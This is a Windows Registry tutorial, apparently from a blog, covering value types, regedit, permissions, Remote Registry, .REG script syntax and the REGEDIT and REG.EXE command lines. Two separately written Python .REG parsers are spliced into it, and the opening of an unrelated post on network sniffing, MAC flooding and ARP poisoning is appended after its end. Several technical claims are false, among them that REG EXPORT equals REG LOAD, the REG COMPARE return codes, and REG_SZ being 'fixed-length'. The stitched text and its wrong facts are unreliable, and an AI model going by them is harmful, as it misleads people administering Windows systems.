------------------------------  ------------------------------------------------------------------------
REG_BINARY                      Usually hardware-specific data stored in hexadecimal format, as viewed from regedt32.exe. By default it will be displayed in hex, but the editor can use either binary or hex display.
REG_DWORD                       Usually service- or device-related data. The value is numeric, four bytes long, and viewed as hex data, but can be edited as binary, decimal or hex. To avoid headaches, I also edit it as hex lest I confuse myself.
REG_DWORD_BIG_ENDIAN            This data is stored as a 32-bit value. The data is weighted with the highest-ordered byte first.
REG_SZ                          Terminated fixed-length text (Unicode) string. These and the other SZ data types are given string editors by the registry editor to administer the values.
REG_MULTI_SZ                    Multiple data listings, represented by text. These values can be separated by spaces, commas or other delimiters.
REG_EXPAND_SZ                   A data string whose data length may change. An example is the folder path to a file or directory for application and environment variable support.
REG_LINK                        Linked data stored in Unicode format.
REG_FULL_RESOURCE_DESCRIPTOR    When viewed, gives information such as hardware DMA, IRQ and memory address length. Data is displayed in hex and can be edited using byte, word or dword format. Regedit.exe gives only a binary editor with a hex representation of the data, without regard to the specific application of the data.
REG_NONE                        When values are not given a data type by an application, or the data is encrypted so that Server 2003 is unable to determine the value type.
REG_RESOURCE_LIST               regedt32.exe displays basic hardware resource types: interface type and bus number.
REG_RESOURCE_REQUIREMENTS_LIST  Related to hardware or drivers. The value data is represented in hex format. It displays a requirements list that contains elements such as "Alternative List", "Resource List", "Descriptor" and "Device Type".
REG_QWORD                       Just like the REG_DWORD value type. The only difference is that REG_DWORD is a 32-bit number and REG_QWORD is a 64-bit number.





You can edit Registry values to fit your needs or to modify some configuration, but it is extremely important that you know exactly what you are doing and what the effects on the operating system will be. It is highly recommended that before editing the registry you make a complete backup of it. To do this, right-click on the first element, 'My Computer', and then click 'Export'. All the information existing in your Registry will be saved in a .REG file that can be edited with Notepad and executed by double-clicking on it. Notice that .REG files are Registry scripts that edit the registry: they can add, rename or delete keys and add, modify or delete values.

To delete a key from the registry, right-click on the desired key and click 'Delete'. To add a new sub-key, right-click on the key you want to create it under and click 'New' > 'Key'; you can then give this key a name. For example, to create a key called 'ABC' under the 'Software' key of the HKEY_CURRENT_USER root key: double-click 'My Computer', then double-click the root key HKEY_CURRENT_USER, then double-click the key 'Software' and you will see its sub-keys and values on the right side of the Registry panel. Now right-click on 'Software', click 'New', then click 'Key' and rename it to 'ABC'.

Suppose now you want to add a string value of type REG_SZ called '123' with value data 'windows'. Right-click on the 'ABC' key, click 'New', then click 'String Value'. A REG_SZ value will appear on the right side of the Registry screen. Rename it to '123' and press Enter. Now double-click this value, type 'windows' in the "Value data" field, press Enter and you are done.

Now let's add a REG_BINARY value called 'BIN' to the 'ABC' key with value data 43. Right-click the 'ABC' key, click 'New', then click 'Binary Value'. Rename this value to 'BIN', then double-click it and type '43' in the "Value data" field. Notice that this field is large, and that whatever you type is automatically converted to hexadecimal, appearing as a decimal value in the centre of the "Value data" field and as a hexadecimal value on the right side. On the left side of each line there are 4 digits, the hexadecimal offset of the first byte on that line, so they read '0000' on the first line, '0008' on the second, '0010' on the third and so on. REG_BINARY values can be entered in hexadecimal or in bytes.

It is possible to add a Registry key to "Favorites" so that you can open it very quickly without having to open the root key, then the sub-key, then the next sub-key and so on. To do this, in your "Regedit" window go to the desired key and click it once; now, at the top of the "Regedit" window, click "Favorites" and then "Add to Favorites". A small window will show up displaying the name of the key in the white field. You can rename it to whatever you want and click "OK". For example, you can add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services to "Favorites" and name it NT_SERVICES. When you need to access this key quickly, you click "Favorites" then select "NT_SERVICES", and you will be instantly brought to the "Services" key. It is possible to delete these "Favorites" as well.

REGEDIT.EXE and REGEDT32.EXE applications: what's the difference?

The REGEDIT.EXE application, when run, can view and edit keys and values in the registry of NT based systems, but only partially, because it is intended for 16-bit Windows. Only the REGEDT32.EXE application can fully edit the registry, as it is intended for 32-bit Windows. On Windows NT and 2000, if you use REGEDIT.EXE to edit REG_EXPAND_SZ and REG_MULTI_SZ value types you will have problems, because the value will become a normal REG_SZ type and therefore will not perform the expected action. It is also not possible to edit security on registry keys with it. On Windows XP and 2003 REGEDT32.EXE is only a small tool that opens the REGEDIT.EXE application. Fortunately, the REGEDIT.EXE application on XP and 2003 can fully edit the registry.

Permissions & Restrictions

It is also possible to set up access permissions on Windows 2000/XP/2003 for root keys and sub-keys. To do this, right-click on a registry root key or sub-key and click on "Permissions". A new window will appear. There you can select which users can access or modify a specific root key or sub-key, and their access rights. Users with administrator privileges have, by default, full access; that means they can read, write and delete any key or value. Restricted users can only read; they can write or delete some specific keys or values, generally related only to that user itself. Some keys in the registry cannot even be read by restricted users. You can customize those settings: a list of existing groups and users of the local computer will be available, and you can choose which users have full access, or restrict access, depending on your needs, by selecting what kind of access a specific user will have to the selected key. You can select, for example, only the read right on that key. Supposing this user is called 1, and you have users 1, 2 and 3, all with admin privileges, when you set up this restriction only user 1 will be limited to reading; users 2 and 3 will have full access. You can also do this to a registry sub-key; the procedure is the same. You can also prevent specific user(s) from viewing a root key or a sub-key. This means that the user won't even be able to open that selected key; if that user tries to open it, an 'Access denied' error message will show up. Registry permissions/restrictions in general are important when you have more than one person accessing the computer, or when the computer is inside a LAN with many users accessing it and the computer holds important data.

Remote Registry

There is a service in Windows 2000/XP/2003 called "Remote Registry". By default this service is enabled and starts automatically on every Windows boot. It is like a "Registry server" intended to receive remote connections from computers on the same network. To connect to a computer running the Remote Registry service, in your "Regedit" window click "File", then click "Connect Network Registry". A small window titled "Select Computer" will show up. You will have 3 basic fields:

The first is titled "Select this object type"; below it is written "Computer". The second field is titled "From this location"; below it is written "GROUP". The third field is titled "Enter the object name to select"; below it there is an empty field where you are supposed to type a valid computer name or IP address. Supposing inside your network you have a computer called Comp1 with IP address 192.168.5.5, you can type "Comp1" or "192.168.5.5" in this field. Click "OK". If all went right you should get a logon prompt. As this service by default is designed for a main security user (Windows XP and maybe 2003; I didn't test on 2000 but it should be identical), you can type there the name of this user, which is "NT AUTHORITY\NetworkService", click "OK" and after a few seconds be connected to the remote computer. (NT AUTHORITY is the domain name and NetworkService is the user name; the domain name was specified since NT AUTHORITY is not the default domain name.) You can also log in with any other valid user name existing on the target computer.

Once connected to the remote computer's Registry you will see the computer name or IP address, depending on which of them you specified. 2 root keys will be available for editing: HKEY_LOCAL_MACHINE and HKEY_USERS\S-1-5-xx, where xx is the number related to the user name you logged on to the remote computer with. To disconnect, click on "File" then click "Disconnect Network Registry".




Importing to the Registry




Besides those things you can do, it is also possible to edit the Registry using scripts and applications written in most programming languages, such as C++, Java, Fortran, Visual Basic, Delphi, Asm, etc. The scripts could be the default Registry script file (.REG files), VBScript, JavaScript, etc. In this tutorial we will only discuss the default Registry script (.REG files).

With .REG scripting you can basically add values to the Registry, delete values, delete keys, add keys and modify value data. This type of script begins with a "title" that is the version of the Windows Registry Editor. For newer Windows it is usually "Windows Registry Editor Version 5.00". But if you want a script that is compatible with ANY Windows version, including 95/98/ME/NT4, you can change this "title" to REGEDIT4.

Notice that it is very important that you write the "title" exactly as it appears. If you, for example, type regedit4 it won't be recognized by Windows and errors will happen. The same goes for version 5: if you type "windows registry editor version 5.00" you will run into errors as well. The structure of this script is the following:




----------------------------------REG Script -------------------------------------------------------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\MySoft1]
@="MySoft1 default value"
"Value1"="3"
"Type"=dword:00000001
"Environment Variable"=hex(0):40,01,00,00,0f,00
"Key"=hex:20,04,00,00,0f,00,70,00,50,00
"RelativePath"=hex(2):63,00,3a,00,5c,00,6d,00,79,00,73,00,6f,00,66,00,\
  74,00,31,00,5c,00,73,00,6f,00,66,00,74,00,2e,00,65,00,78,00,65,00,00,00
"Applications"=hex(7):61,00,62,00,63,00,20,00,64,00,65,00,66,00,20,00,\
  67,00,68,00,69,00,20,00,6a,00,6b,00,6c,00,00,00,00,00
"MainType"=hex(5):40,01,00

[HKEY_LOCAL_MACHINE\SOFTWARE\MySoft1\Preferences]
"AlwaysRunMaximized"=dword:00000001

-----------------------------End of REG Script----------------------------------------------------------




Notice that REG scripts begin with the version information of the Registry Editor.

If you try to import a REG script that begins with "Windows Registry Editor Version 5.00" into a Windows 95/98/ME or NT4 Registry, you will get an error. To overcome this you can start the script with REGEDIT4 instead. This one is accepted by any Windows version, including recent ones like XP Service Pack 2 and Windows 2003. The second line of the script is blank, just to keep it organized. On the next line you have the Registry path between brackets "[ ]". Notice that if you forget those brackets the script won't do what it was supposed to. In the line below it there is an "@" (with no quotes), an "equals" sign after it, and "MySoft1 default value" (between quotes). The "@" means the default value. Every key that you create will contain this default value, and it usually contains no data; if no data is specified you will see "(value not set)". The equals sign must exist to separate values from their data. The value name in this case is "Default", the type is REG_SZ and the data is MySoft1 default value. The same goes for the line below:

The value name is "Value1", the type is REG_SZ and the value data is "3". Notice that any value name except the default value ("@") must appear between quotes. When you have value types other than REG_SZ, the respective data will appear without quotes: notice that the data of the other values (REG_DWORD, REG_BINARY, REG_EXPAND_SZ, etc.) appears without quotes. Notice also that the data of all the other types, except REG_DWORD and REG_SZ, begins with hex: or hex(z):, where "z" is the number that determines the value type. "z" is usually a number between 5 and 9, but it could also be 0 or 2, could be absent altogether (eg: hex:00,12,00 or hex(2):00,01,00), and could also be "a" or "b". Below there is a table with these values of "z" and the resulting value type.




hex(z):   Resulting value type
--------  ------------------------------------------------------------------------
hex:      REG_BINARY (PS: this is the same as hex(3):)
hex(0):   REG_NONE
hex(1):   REG_SZ (PS: not recommended; using hex(1): generates data that is not correctly interpreted by the Registry and therefore appears as "weird" symbols.)
hex(2):   REG_EXPAND_SZ
hex(3):   REG_BINARY (PS: this is the same as hex:)
hex(4):   REG_DWORD (PS: not recommended; using hex(4): generates data that is not correctly interpreted by the Registry and therefore appears as "invalid DWORD value". Simply use dword: instead.)
hex(5):   REG_DWORD_BIG_ENDIAN
hex(6):   REG_LINK
hex(7):   REG_MULTI_SZ
hex(8):   REG_RESOURCE_LIST
hex(9):   REG_FULL_RESOURCE_DESCRIPTOR
hex(a):   REG_RESOURCE_REQUIREMENTS_LIST
hex(b):   REG_QWORD

The 14th line, as you can see, is blank (for organization purposes), and just below it there is another Registry path that is the same as the first one on line 3, but with a sub-key of "MySoft1" called Preferences, and a value of type REG_DWORD called "AlwaysRunMaximized" with data 1 (as a dword, 0x00000001). This is not just information; it has a meaning, and the meaning is "1": 1 means true, 0 means false.

So we can figure out that the "MySoft1" program's window is configured to always run maximized. Some programs also store configuration such as user passwords in the registry, but encrypted, and usually as a REG_BINARY value type.

The REG script below will delete a value from the registry and then, an entire key, including subkeys and values.




-----------------------------------------REG Script-------------------------------------------------------

REGEDIT4

[HKEY_CURRENT_USER\Software\Soft123]
"type"=-

[-HKEY_CURRENT_USER\Software\Soft123456]

-------------------------------------End of REG Script--------------------------------------------------




Notice that the above script is able to run in any Windows version, not only in 2000/XP/2003 (due to beginning with "REGEDIT4"). The first script will only be able to run on 2000/XP/2003, unless you change the title ("Windows Registry Editor Version 5.00") to REGEDIT4. To delete a value, a "minus" sign is used after the "equals" sign of a specific value; in our case the value is "type". To delete a key in the registry, we simply have to put a "minus" sign before the key path. This will delete the last key specified in the path (in this case Soft123456) and all its sub-keys and values.

Neither of the 2 scripts described above contained values of type REG_LINK, REG_RESOURCE_REQUIREMENTS_LIST, REG_RESOURCE_LIST or REG_FULL_RESOURCE_DESCRIPTOR, because these are related to hardware information and configuration and are very rarely used, except by the hardware itself at the time it is installed. The REG_NONE and REG_QWORD types are also very rarely used. The first one occurs when the Registry cannot interpret the data (sometimes because it is encrypted) and therefore cannot establish the value type. The second one is a 64-bit value generally used to store information about hardware.
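A .REG file is executed by double-clicking it, so it is worth being able to read one mechanically before importing it. The following Python parser is an added example, not part of the tutorial: it checks the exact header spelling, handles [key] and [-key] lines, the "@" default value and quoted value names, the "-" deletion marker, dword: data, and hex:/hex(z): data with backslash line continuation, mapping "z" to the value type exactly as in the table above. The sample script is constructed by combining lines from the tutorial's two scripts under one header; HEX_TYPES, parse_reg, decode_data and describe are this example's own names.

```python
import re

# hex(z) type numbers from the tutorial's table; a bare "hex:" is hex(3), REG_BINARY
HEX_TYPES = {
    0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
    4: "REG_DWORD", 5: "REG_DWORD_BIG_ENDIAN", 6: "REG_LINK",
    7: "REG_MULTI_SZ", 8: "REG_RESOURCE_LIST", 9: "REG_FULL_RESOURCE_DESCRIPTOR",
    10: "REG_RESOURCE_REQUIREMENTS_LIST", 11: "REG_QWORD",
}
HEADERS = ("REGEDIT4", "Windows Registry Editor Version 5.00")

# Constructed sample: lines from the tutorial's two scripts, combined under one header
SAMPLE_SCRIPT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\MySoft1]
@="MySoft1 default value"
"Value1"="3"
"Type"=dword:00000001
"Key"=hex:20,04,00,00,0f,00,70,00,50,00
"RelativePath"=hex(2):63,00,3a,00,5c,00,6d,00,79,00,73,00,6f,00,66,00,\
  74,00,31,00,5c,00,73,00,6f,00,66,00,74,00,2e,00,65,00,78,00,65,00,00,00
"Applications"=hex(7):61,00,62,00,63,00,20,00,64,00,65,00,66,00,20,00,\
  67,00,68,00,69,00,20,00,6a,00,6b,00,6c,00,00,00,00,00

[HKEY_CURRENT_USER\Software\Soft123]
"type"=-

[-HKEY_CURRENT_USER\Software\Soft123456]
'''

_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
_HEX_RE = re.compile(r'^hex(?:\(([0-9a-fA-F]+)\))?:(.*)$')


def _unescape(s):
    return re.sub(r'\\(.)', r'\1', s)  # \\ -> \ and \" -> "


def _join_continuations(lines):
    """Merge hex data wrapped with a trailing backslash onto one logical line."""
    out, buf = [], ""
    for line in lines:
        if line.rstrip().endswith("\\"):
            buf += line.rstrip()[:-1].strip()
        else:
            out.append(buf + line.strip())
            buf = ""
    return out


def decode_data(data, unicode_strings):
    """Turn the right-hand side of a value line into (type_name, python_value)."""
    if data == "-":
        return "DELETE", None
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return "REG_SZ", _unescape(data[1:-1])
    if data.startswith("dword:"):
        return "REG_DWORD", int(data[6:], 16)
    m = _HEX_RE.match(data)
    if not m:
        raise ValueError(f"unrecognised value data: {data!r}")
    type_name = HEX_TYPES.get(int(m.group(1), 16) if m.group(1) else 3, "REG_UNKNOWN")
    raw = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
    # Version 5.00 scripts carry strings as UTF-16LE, REGEDIT4 scripts as ANSI bytes
    enc = "utf-16-le" if unicode_strings else "latin-1"
    if type_name in ("REG_SZ", "REG_EXPAND_SZ"):
        return type_name, raw.decode(enc, errors="replace").rstrip("\0")
    if type_name == "REG_MULTI_SZ":
        return type_name, [s for s in raw.decode(enc, errors="replace").split("\0") if s]
    if type_name == "REG_DWORD_BIG_ENDIAN" and len(raw) == 4:
        return type_name, int.from_bytes(raw, "big")
    if type_name == "REG_QWORD" and len(raw) == 8:
        return type_name, int.from_bytes(raw, "little")
    return type_name, raw


def parse_reg(text):
    """Parse a .REG script into the operations importing it would perform:
    ('add_key', key), ('delete_key', key), ('delete_value', key, name) or
    ('set', key, name, type_name, value).  Name "" is the (Default) value."""
    lines = _join_continuations(text.lstrip("\ufeff").splitlines())
    header = lines[0].strip() if lines else ""
    if header not in HEADERS:  # exact spelling and case, as the tutorial warns
        raise ValueError(f"unrecognised header line: {header!r}")
    unicode_strings = header != "REGEDIT4"
    ops, key = [], None
    for line in lines[1:]:
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            if path.startswith("-"):
                key, op = None, ("delete_key", path[1:])
            else:
                key, op = path, ("add_key", path)
            ops.append(op)
            continue
        m = _VALUE_RE.match(line)
        if key is None or not m:
            raise ValueError(f"malformed line: {line!r}")
        name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        type_name, value = decode_data(m.group(2).strip(), unicode_strings)
        ops.append(("delete_value", key, name) if type_name == "DELETE"
                   else ("set", key, name, type_name, value))
    return ops


def describe(text):
    """Human-readable list of what importing the script would change."""
    out = []
    for op in parse_reg(text):
        if op[0] == "add_key":
            out.append(f"create/keep key {op[1]}")
        elif op[0] == "delete_key":
            out.append(f"DELETE key {op[1]} with all sub-keys and values")
        elif op[0] == "delete_value":
            out.append(f"DELETE value {op[2] or '(Default)'} under {op[1]}")
        else:
            out.append(f"set {op[2] or '(Default)'} under {op[1]} = {op[3]} {op[4]!r}")
    return out


if __name__ == "__main__":
    print("\n".join(describe(SAMPLE_SCRIPT)))
```

Running it on the sample lists every key it would create, every value it would set (with the hex(2) path and hex(7) list decoded to readable text) and, in capitals, the value and the whole key the second half of the script would delete. The header decides how strings are decoded: Version 5.00 scripts store hex(2)/hex(7) text as UTF-16LE, REGEDIT4 scripts as single-byte ANSI, which is the practical difference behind the two "titles" the tutorial describes.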




Exporting from the Registry




To export a desired key from the registry, you simply have to right-click that key and select "Export". A new window prompting where to save the key will show up. Where you see "File name", type the name you want for the file that will store the information about the key.

In the "Save as type" field you can select "Registry Files (*.reg)", "Text Files (*.txt)", "Registry Hive Files" or "Win9x/NT4 Registry Files (*.reg)". Depending on what you will do with the REG file, you will select one of those options. If it's just for studying/analysing purposes, then you can save it as a normal txt file. Let's suppose this file will have information about NT services (NT services are only intended for the NT systems and therefore won't work in Windows 95/98/ME); then the best option is saving it as "Registry Files (*.reg)". But suppose the REG file contains information about a piece of software, for example, and this software is able to run in any Windows version; then it's better to save it as "Win9x/NT4 Registry Files (*.reg)", because this way the file can be imported into the Registry of any Windows. Just below this, at the bottom of the window, you can see the "Export range" section, and below it the complete registry path to the key you will be exporting. If you double-click a REG file you will be prompted with a message "Are you sure you want to add the information contained in "file.reg" to the Registry?" (supposing "file.reg" is the file you want to import into the registry). If you click "No" the operation will be cancelled; if you click "Yes", and the REG file is valid and correct, you will get a message saying the information in "file.reg" was successfully added to the registry.




Editing the Registry via Command Line




We have already seen that it is possible to edit the Registry manually and using scripts. It is also possible to edit it using the Windows "Command Prompt" (COMMAND.COM in any Windows version and CMD.EXE in Win NT4/2000/XP/2003).

The REGEDIT.EXE tool has a GUI part and a command line part.

REGEDIT.EXE command line syntax:




Command            Effect
-----------------  ------------------------------------------------------------------------
REGEDIT /E         Exports keys and values from the Registry to a .REG file
REGEDIT /I         Imports a .REG file into the Registry. Before writing to the registry a confirmation prompt will appear asking if you really want to import the file
REGEDIT /S         Imports a .REG file into the Registry in silent mode. No confirmation prompts.
REGEDIT /D         Deletes a key from the registry (Win9x only)
REGEDIT /L:System  Specifies the location of the System.dat to use (Win9x only)
REGEDIT /R:User    Specifies the location of the User.dat to use (Win9x only)
REGEDIT /C         Compresses the Registry (only works on Win98)




Usage examples for the above commands are shown below.




REGEDIT /E c:\file1.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Some Program"

This will export the Registry key "Some Program", located in "HKEY_LOCAL_MACHINE\SOFTWARE", to a file called file1.reg in c:\




REGEDIT /I c:\file2.reg

This will import the information in "file2.reg" to the Registry. A confirmation prompt will show up.




REGEDIT /S c:\file3.reg

This will silently import the information in "file3.reg" to the Registry. No confirmation prompts.




The above commands are the most used ones and work on all Windows versions.

The /L:System and /R:User parameters are optional, only work on Win9x, and come before all the other parameters.

Example: REGEDIT [/L:System | /R:User] /S c:\file1.reg. This will silently import the information in "file1.reg" to the Registry, specifying the location of the System.dat and User.dat to use.
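Because REGEDIT /S writes a .REG file into the Registry without asking, it is useful to be able to read such a file and list what it would change before importing it. The following parser is an added example, not code from the original article or from REGEDIT; it handles the export format described above (the "Windows Registry Editor Version 5.00" header for NT-family exports, "REGEDIT4" for Win9x/NT4 files) and runs over a constructed sample file.

```python
"""List the Registry changes a .REG file would make when imported.
Added example, not part of the original article or of REGEDIT; it reads the
export format discussed above (Version 5.00 for NT, REGEDIT4 for Win9x/NT4).
SAMPLE_REG is a constructed file, not a real export."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

HEADERS = ("Windows Registry Editor Version 5.00", "REGEDIT4")
SERVICES_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES"
_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')   # "name"=data or @=data

# Constructed sample: values, a backslash-continued hex line, a service entry,
# a key deletion ([-key]) and a value deletion ("name"=-).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Some Program]
@="Some Program"
"InstallPath"="C:\\Program Files\\Some Program"
"Enabled"=dword:00000001
"Blob"=hex:01,02,\
  03,04

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Soft1Svc]
"Start"=dword:00000002

[-HKEY_LOCAL_MACHINE\SOFTWARE\Soft1]

[HKEY_CURRENT_USER\Software\MySoft3]
"path"=-
"""

@dataclass
class RegChange:
    key: str
    action: str          # add_key | delete_key | set_value | delete_value
    name: str = ""       # value name; "" is the key's default value (@)
    vtype: str = ""      # REG_SZ, REG_DWORD, REG_BINARY, ...
    data: object = None

def _decode(raw: str) -> Tuple[str, object]:
    # Map the right-hand side of a value line to (type name, Python value).
    raw = raw.strip()
    if raw == "-":
        return ("", None)                                  # deletion marker
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        # Inside quotes, backslash and double quote are escaped with a backslash.
        return ("REG_SZ", re.sub(r"\\(.)", r"\1", raw[1:-1]))
    if raw.lower().startswith("dword:"):
        return ("REG_DWORD", int(raw[6:], 16))
    m = re.match(r"hex(?:\(([0-9a-f]+)\))?:(.*)$", raw, re.IGNORECASE)
    if not m:
        raise ValueError("unrecognised value syntax: %r" % raw)
    blob = bytes.fromhex(m.group(2).replace(",", "").replace(" ", ""))
    type_id = (m.group(1) or "3").lower()                 # bare hex: is REG_BINARY (3)
    return ("REG_BINARY" if type_id == "3" else "hex(%s)" % type_id, blob)

def parse_reg(text: str) -> List[RegChange]:
    lines = text.lstrip("\ufeff").splitlines()             # exports may carry a BOM
    if not lines or lines[0].strip() not in HEADERS:
        raise ValueError("not a .REG file: missing REGEDIT4 / Version 5.00 header")
    logical: List[str] = []                                # fold continued lines
    for line in lines[1:]:
        if logical and logical[-1].endswith("\\"):
            logical[-1] = logical[-1][:-1] + line.strip()
        else:
            logical.append(line.strip())
    changes: List[RegChange] = []
    current: Optional[str] = None
    for line in logical:
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):                        # [-key]: delete whole key
                current = None
                changes.append(RegChange(key[1:], "delete_key"))
            else:
                current = key
                changes.append(RegChange(key, "add_key"))
            continue
        m = _VALUE_LINE.match(line)
        if m is None or current is None:
            raise ValueError("malformed or misplaced value line: %r" % line)
        name = "" if m.group(1) == "@" else re.sub(r"\\(.)", r"\1", m.group(1)[1:-1])
        vtype, data = _decode(m.group(2))
        action = "delete_value" if vtype == "" else "set_value"
        changes.append(RegChange(current, action, name, vtype, data))
    return changes

def review(changes: List[RegChange]) -> List[str]:
    """What deserves a look before a silent (/S) import: deletions and service edits."""
    notes = []
    for c in changes:
        if c.action == "delete_key":
            notes.append("deletes key and everything under it: " + c.key)
        elif c.action == "delete_value":
            notes.append("deletes value %r in %s" % (c.name, c.key))
        elif c.action == "set_value" and c.key.upper().startswith(SERVICES_KEY):
            notes.append("changes service setting %r under %s" % (c.name, c.key))
    return notes
```

Run review(parse_reg(open("file.reg", encoding="utf-16").read())) on a real export to see the deletions and service changes it would apply.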




REGEDIT /D is rarely used and only works on Win9x. It is intended to remove a key from the Registry. Example: REGEDIT /D HKEY_LOCAL_MACHINE\SOFTWARE\Soft1

This will delete the key "Soft1", located in HKEY_LOCAL_MACHINE\SOFTWARE, from the Registry.




REGEDIT /C will compress the Registry. It is intended to work only on Win98. The usage: REGEDIT /C [filename]




Windows XP and 2003 come with a command-line tool to edit the Registry called "REG.EXE". By default Windows NT4 and 2000 don't have this tool, but it is available in the "Windows Resource Kit Tools" package, which can be freely downloaded from Microsoft.com, or it can simply be copied, along with the application "Regini.exe", from Windows XP or 2003.

Below is a table with the "REG.EXE" commands and their effects.




Command         Effect
REG QUERY       Queries a Registry key or value by its given name.
REG ADD         Adds a key or value to the Registry.
REG DELETE      Deletes a key or value from the Registry.
REG COPY        Copies subkeys and values from one key to another.
REG SAVE        Saves a Registry section to a file.
REG RESTORE     Restores a file to substitute a Registry key.
REG LOAD        Loads a file into a Registry key.
REG UNLOAD      Unloads a Registry section.
REG COMPARE     Compares the values and sub-keys of one key with the respective values and sub-keys of another key.
REG EXPORT      Exports/Loads a file in a Registry key.
REG IMPORT      Imports a file to the Registry.




REG.EXE makes it possible to write the Registry root keys by their short names, as shown below:

HKEY_LOCAL_MACHINE = HKLM

HKEY_CURRENT_USER = HKCU

HKEY_USERS = HKU

HKEY_CLASSES_ROOT = HKCR

HKEY_CURRENT_CONFIG = HKCC




Some examples of the usage of the commands listed in the table above follow.




REG QUERY HKLM\SOFTWARE\Soft1 /v Config - This will display the Registry value "Config".

REG QUERY HKLM\SOFTWARE - Displays all the values and sub-keys of the key "Software".




REG ADD HKCU\Software\Mysoft2 - Adds a key called "Mysoft2" to the Registry.

REG ADD HKLM\Software\War /v Types /t REG_DWORD /d 1 /f - Adds a key called "War" (in case it doesn't exist yet) and a value called "Types" of type REG_DWORD to the Registry. If "/t" is omitted the value will be of type REG_SZ. The "/f" parameter forces the action being taken, with no confirmation prompts.




REG DELETE HKLM\SOFTWARE\MySoft1 /f - Deletes the key "Mysoft1" and all its sub-keys and values, with no confirmation prompts.

REG DELETE HKLM\SOFTWARE\MySoft3 /v path /f - Deletes the value "path" located in the "Mysoft3" key, with no confirmation prompts.




REG COPY HKCU\SOFTWARE\Soft1 HKCU\SOFTWARE\Soft1_Backup /f - Copies all the sub-keys and values of the "Soft1" key to the "Soft1_Backup" key without confirmation.




REG SAVE HKLM\System\CurrentControlSet\Services c:\Services_Backup.TXT - Saves the Registry section "Services" in the file Services_Backup.TXT located in C:\




REG RESTORE HKLM\System\CurrentControlSet\Services c:\Services_Backup.TXT - Restores the file "Services_Backup.TXT" to substitute the Registry key "Services".




REG LOAD HKLM\System c:\hklm_System.TXT - Loads the file hklm_System.TXT into the Registry key "HKLM\System".




REG UNLOAD HKCU\Software - Unloads the "Software" section in the root key "HKCU".




REG COMPARE HKCU\Software\MySoft2\System1 HKCU\Software\MySoft2\System2 - Compares all the values under the key "System1" with those under "System2".

REG COMPARE HKCU\Software\MySoft2\System1 HKCU\Software\MySoft2\System2 /v Path - Compares the value "Path" in the keys "System1" and "System2".

REG COMPARE HKCU\Software\MySoft1 HKCU\Software\MySoft2\ /s - Compares all the values and sub-keys in the keys "MySoft1" and "MySoft2".

Return codes: 1 = Success, the compared result is identical. 2 = Failure. 3 = Success, the compared result is different.




REG EXPORT - This is exactly the same as the "REG LOAD" command.




REG IMPORT c:\file.reg - Imports the "file.reg" located in c:\ to the Registry.




Final Notes




Notice that the 'REG.EXE' application is a command-line tool intended for Windows NT4, 2000, XP and 2003, but it is built in only on XP and 2003. The 'REGEDIT.EXE' application has a GUI (graphical user interface) and some command-line parameters. The REGEDT32.EXE application is only present on 32-bit Windows operating systems such as Windows NT4, 2000, XP and 2003.




Remember to ALWAYS make a complete backup before editing the Registry, as well as before editing any other kind of configuration, file, important information, etc.




This article has shown, explained and detailed some things related to the Windows Registry, and you have probably learned some cool things from it, but it will NOT, in any way, make you an expert. There are lots and lots of other tricky things you can do with this cute little tool called "Regedit", such as editing the information and configuration of software and services, setting up specific restrictions on the Registry itself or on any other software, changing the OS look, visual effects and some graphics-related settings, among other things, and you will have to look deep inside and understand the meaning of some commonly used value data. Tip: look closely at REG_DWORD value data and you will learn a lot and better understand the options and configurations that were set up in your Windows.




Finally, I hope you have enjoyed it.




---------------*END*-----------------


Sniffing & hijacking  

Tuesday, January 15, 2008

Sniffers are a powerful piece of software. They have the capability to place the hosting system's network card into promiscuous mode. A network card in promiscuous mode can receive all the data it can see, not just packets addressed to it. If you are on a hub, a lot of traffic can potentially be affected, because hubs see all the traffic in that particular collision domain. Sniffing performed on a hub is known as passive sniffing. Ethernet switches are smarter. A switch is supposed to be smart enough to know which particular port to send traffic to and to block it from all the rest. However, there can be exceptions to this rule. Sometimes switches have one port configured to receive copies of all the packets in the broadcast domain; that type of port spanning is done for administrative monitoring. When sniffing is performed on a switched network, it is known as active sniffing.

Sniffers operate at the Data Link layer of the OSI model. This means that they do not have to play by the same rules as applications and services that reside further up the stack. Sniffers can grab whatever they see on the wire and record it for later review. They allow the user to see all the data contained in the packet, even information that should remain hidden.

Passive sniffing is performed when the user is on a hub. Because the user is on a hub, all traffic is sent to all ports. All the attacker must do is start the sniffer and wait for someone on the same collision domain to start sending or receiving data. A collision domain is a logical area of the network in which one or more data packets can collide with each other. Whereas switches separate collision domains, hubs place all users in one single shared segment or collision domain.

The other reason that sniffing has lost some of its mystical status is that so many more people use encryption than in the past. Protocols such as Secure Sockets Layer (SSL) and Secure Shell (SSH) have largely replaced plain Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP). With all these barriers in place, we will see what a hacker must do to successfully use a sniffer.


[Active Sniffing]


For sniffers to be successfully used, the attacker must be on your local network or on a prominent intermediary point, such as a border router, through which traffic passes. The attacker must also know how to perform active sniffing. A switch limits the traffic that a sniffer can see to broadcast packets and those specifically addressed to the attached system. Traffic between two other hosts would not normally be seen by the attacker, as it would not normally be forwarded to the switch port that the sniffer is plugged in to. Media Access Control (MAC) flooding and Address Resolution Protocol (ARP) poisoning are the two ways that the attacker can attempt to overcome the limitations imposed by a switch.

